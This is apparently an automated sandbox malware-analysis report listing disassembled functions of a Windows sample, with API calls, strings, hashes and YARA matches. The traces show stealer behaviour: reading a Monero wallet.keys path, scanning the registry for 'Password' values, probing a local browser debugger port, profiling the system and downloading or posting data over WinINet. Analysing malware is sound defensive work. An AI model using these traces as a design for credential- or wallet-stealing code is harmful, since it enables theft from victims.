                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                              • API String ID: 1930502592-218353709
                                              • Opcode ID: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                              • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                              • Opcode Fuzzy Hash: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                              • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                              Function 00405000 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82networkmemoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                              • HeapAlloc.KERNEL32(00000000), ref: 00405021
                                              • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                              • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                              • InternetCloseHandle.WININET(+aA), ref: 00405109
                                              • InternetCloseHandle.WININET(?), ref: 00405116
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                              • String ID: +aA$+aA
                                              • API String ID: 3894370878-2425922966
                                              • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                              • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                              • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                              • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                              Function 04844B37 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04844BCC
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 04844BF1
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04844D71
                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 0484509F
                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048450BB
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048450CF
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 04845100
                                              • InternetCloseHandle.WININET(00000000), ref: 04845164
                                              • InternetCloseHandle.WININET(00000000), ref: 0484517C
                                              • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 04844DCC
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • InternetCloseHandle.WININET(00000000), ref: 04845186
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                              • String ID:
                                              • API String ID: 2402878923-0
                                              • Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                              • Instruction ID: 9afab5a53b6a4f984645d0d6ba6c87f2df58403e46c2b308d0af72171f0df540
                                              • Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
                                              • Instruction Fuzzy Hash: 1F121F71901218AADB59FB94DC90FEEB379AF54705F504B99A506B20A0EFB03F48CF52
                                              Function 04846537 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 04846598
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 048465BA
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048465EC
                                              • HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 0484663C
                                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 04846676
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04846688
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 048466B4
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 04846724
                                              • InternetCloseHandle.WININET(00000000), ref: 048467A6
                                              • InternetCloseHandle.WININET(00000000), ref: 048467B0
                                              • InternetCloseHandle.WININET(00000000), ref: 048467BA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                              • String ID:
                                              • API String ID: 3074848878-0
                                              • Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                              • Instruction ID: 7aeed581dadb4c3732590b9e24f683c88855ba6fdbca22bf3786e727a896dd2f
                                              • Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
                                              • Instruction Fuzzy Hash: 5E715F71A0021CABEB14DFA4CC88FEDB775AF44705F108699E50ABB190EBB57A84CF41
                                              Function 04859407 Relevance: 16.7, APIs: 11, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 04859463
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateGlobalStream
                                              • String ID:
                                              • API String ID: 2244384528-0
                                              • Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                              • Instruction ID: 7b17da83442e838b300ff461f3d7fb40d3f0544df9f34052d625e774f4529049
                                              • Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
                                              • Instruction Fuzzy Hash: FA71EAB5E05208EBDB04DFE4DC88FEDB7B9AB48304F108649F915E7294EB74A904CB61
                                              Function 04849E47 Relevance: 16.4, APIs: 13, Instructions: 141stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04849CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 04849CD1
                                              • memset.MSVCRT ref: 04849E9A
                                              • lstrcat.KERNEL32(?,004212A8), ref: 04849EAF
                                              • lstrcat.KERNEL32(?,00000000), ref: 04849EC5
                                              • memset.MSVCRT ref: 04849F01
                                              • lstrcat.KERNEL32(?,004212BC), ref: 04849F16
                                              • lstrcat.KERNEL32(?,004212C4), ref: 04849F28
                                              • lstrcat.KERNEL32(?,?), ref: 04849F3C
                                              • lstrcat.KERNEL32(?,004212C8), ref: 04849F4E
                                              • lstrcat.KERNEL32(?,?), ref: 04849F62
                                              • lstrcat.KERNEL32(?,004212CC), ref: 04849F74
                                              • lstrlen.KERNEL32(00000000), ref: 04849F7E
                                              • lstrlen.KERNEL32(00000000), ref: 04849F8D
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • memset.MSVCRT ref: 04849FE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                              • String ID:
                                              • API String ID: 689835475-0
                                              • Opcode ID: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                              • Instruction ID: e98ea16f2925923a40c4de9e30d90a30c75e350d887d5445ce3ec05a70565ea9
                                              • Opcode Fuzzy Hash: e67822385d328e2dce11951795e88f3921dfec35951474a789e8be3019acb687
                                              • Instruction Fuzzy Hash: FD5180B5D00218ABDB14EBE4DC89FEE7338BF54306F404A99E505E60A0EB74A644CF62
                                              Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                              • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$Open$CloseHandle
                                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                              • API String ID: 3289985339-2144369209
                                              • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                              • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                              • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                              • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                              Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                                • Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                              • lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
                                              • lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
                                              • lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
                                              • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
                                              • lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
                                              • task.LIBCPMTD ref: 0040775B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                              • String ID: :
                                              • API String ID: 3191641157-3653984579
                                              • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                              • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                              • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                              • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                              Function 04851862 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcpy.KERNEL32(?,?), ref: 04851892
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                                • Part of subcall function 04859657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,0484A1D8,00000000,006D6E5C,00000000), ref: 04859663
                                              • lstrcpy.KERNEL32(?,00000000), ref: 048518CE
                                                • Part of subcall function 04859657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,0484A1D8,00000000,006D6E5C), ref: 04859687
                                                • Part of subcall function 04859657: lstrlen.KERNEL32(00000000,?,0484A1D8,00000000,006D6E5C), ref: 0485969E
                                                • Part of subcall function 04859657: wsprintfA.USER32 ref: 048596BE
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851916
                                              • lstrcpy.KERNEL32(?,00000000), ref: 0485195E
                                              • lstrcpy.KERNEL32(?,00000000), ref: 048519A5
                                              • lstrcpy.KERNEL32(?,00000000), ref: 048519ED
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851A35
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851A7C
                                              • lstrcpy.KERNEL32(?,00000000), ref: 04851AC4
                                                • Part of subcall function 0485AD97: lstrlen.KERNEL32(048451BC,?,?,048451BC,00420DDF), ref: 0485ADA2
                                                • Part of subcall function 0485AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0485ADFC
                                              • strtok_s.MSVCRT ref: 04851C07
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                              • String ID:
                                              • API String ID: 4276352425-0
                                              • Opcode ID: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                              • Instruction ID: d83667adf359eb98399c8332242f3d9487f58ab87ae473a66dc86e601c923461
                                              • Opcode Fuzzy Hash: da86a3651816fd612d9f19635d2e19fbb626f2ddea617614ccf9717b4b52eb80
                                              • Instruction Fuzzy Hash: 5D7197B5D011189BDB14FB64DC88EEE7379AF54304F044ED9E909E2150EEB56A88CF52
                                              Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00407374
                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                              • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                              • task.LIBCPMTD ref: 004075B5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                              • String ID: Password
                                              • API String ID: 2698061284-3434357891
                                              • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                              • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                              • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                              • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                              Function 048578F7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 04857939
                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04857976
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 048579FA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857A01
                                              • wsprintfA.USER32 ref: 04857A37
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                              • String ID: :$C$\
                                              • API String ID: 1544550907-3809124531
                                              • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction ID: a39a7d8476efcdbd9c55c5abe58101424eeac0be5ea38d8fc7e6b4cd61e6f6e7
                                              • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                              • Instruction Fuzzy Hash: EA41C5B1D05258EBDB10DF94CC84BEEBB78AF08704F044599F505A7290E7756B84CBA6
                                              Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,02CA5388,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,02CA5388,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                              • __aulldiv.LIBCMT ref: 00418302
                                              • __aulldiv.LIBCMT ref: 00418310
                                              • wsprintfA.USER32 ref: 0041833C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                              • String ID: %d MB$@
                                              • API String ID: 2886426298-3474575989
                                              • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                              • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                              Function 048584F7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006D6D60,00000000,?,00420E14,00000000,?,00000000), ref: 04858527
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0485852E
                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 0485854F
                                              • __aulldiv.LIBCMT ref: 04858569
                                              • __aulldiv.LIBCMT ref: 04858577
                                              • wsprintfA.USER32 ref: 048585A3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                              • String ID: @$pkm
                                              • API String ID: 2774356765-1350193380
                                              • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction ID: 6c870c8f1741534d006e226d5ab3e2339ec1869f1de24ea84792286055ecba30
                                              • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                              • Instruction Fuzzy Hash: CA211DB1E44358ABDB00DFD4CC45FAEBBB9FB44B15F10460AFA15BB290D77869008BA5
                                              Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                              • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                              • StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406197
                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                              • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                              • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                              • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                              • String ID:
                                              • API String ID: 4287319946-0
                                              • Opcode ID: 79bb47fcace65dc0c408726790117bb2adccae202de1a5eabfd6db97336226ad
